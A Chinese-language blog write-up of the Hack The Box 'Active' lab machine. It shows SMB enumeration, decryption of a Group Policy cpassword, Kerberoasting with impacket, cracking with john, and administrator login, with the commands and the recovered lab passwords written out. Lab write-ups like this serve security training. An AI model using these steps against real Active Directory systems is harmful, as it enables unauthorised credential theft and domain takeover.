HTB:Active渗透测试

1,114 阅读2分钟

基础信息

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透。
链接:www.hackthebox.eu/home/machin… 描述:

1629378454_611e579621b2f84588acf.png 注:没有网络安全就没有国家安全,以巩固国家安全防护为由对于该计算机进行渗透,所有行为都是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

1、靶机IP

通过基础信息知道靶机IP为:10.10.10.100

2、开放端口与服务

nmap -sS -sV -A -O 10.10.10.100 -o xb.log

通过nmap扫描得知active.htb安装在AD域中,并且开放了smb服务\

1629379532_611e5bcc4e63f391d29fb.png

1629379558_611e5be638419dc2716fb.png

二、漏洞探测与利用

尝试使用smb中继攻击进行尝试,看看能都获取到有用的信息

smbmap -H 10.10.10.100

发现可以登录到Replication

1629380060_611e5ddcdcac799e6f38f.png

smbclient //10.10.10.100/Replication

使用smbclient匿名登录到Replication\

1629443294_611f54dee9f8e4c2355e9.png 在\active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\发现Groups.xml
将文件下载到本地进行查看\

1629443493_611f55a5ca0d764f7b2f7.png 发现了一个用户与密码\

1629444296_611f58c81094814872722.png cpassword是组策略密码可以使用kali自带的工具进行破解

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

获得明文密码:GPPstillStandingStrong2k18\

1629444452_611f5964c098e6c66e862.png 使用smbclient登录到SVC_TGS用户

smbclient //10.10.10.100/Users -U SVC_TGS

1629444721_611f5a717e790bc9ecb2d.png 在SVC_TGS用户下发现user.txt
下载到本机中进行查看\

1629444898_611f5b22e46caca9a2d19.png 得到user.txt\

1629445211_611f5c5bf032389149ac0.png

三、提权

通过对该用户进行信息收集发现没有可以利用到了信息了
回过头看一下nmap的扫描结果发现 88端口开放了kerberoas服务\

1629445626_611f5dfac9cbec2cd5c17.png 可以利用GetUserSPNs.py从impacket得到管理员Kerberos凭证
impacket链接:github.com/SecureAuthC…

1629446919_611f6307657976c2d84eb.png 获取到密钥凭证,使用john破解获取明文即可

vim pass.txt
john pass.txt --wordlist=/usr/share/wordlists/rockyou.txt

1629448367_611f68af0cfc2bf88c227.png 使用该密码进行登录:Ticketmaster1968

smbclient -U administrator //10.10.10.100/Users

获取到root.txt\

1629448753_611f6a31157cf909e88c2.png

1629448781_611f6a4da54127a30e131.png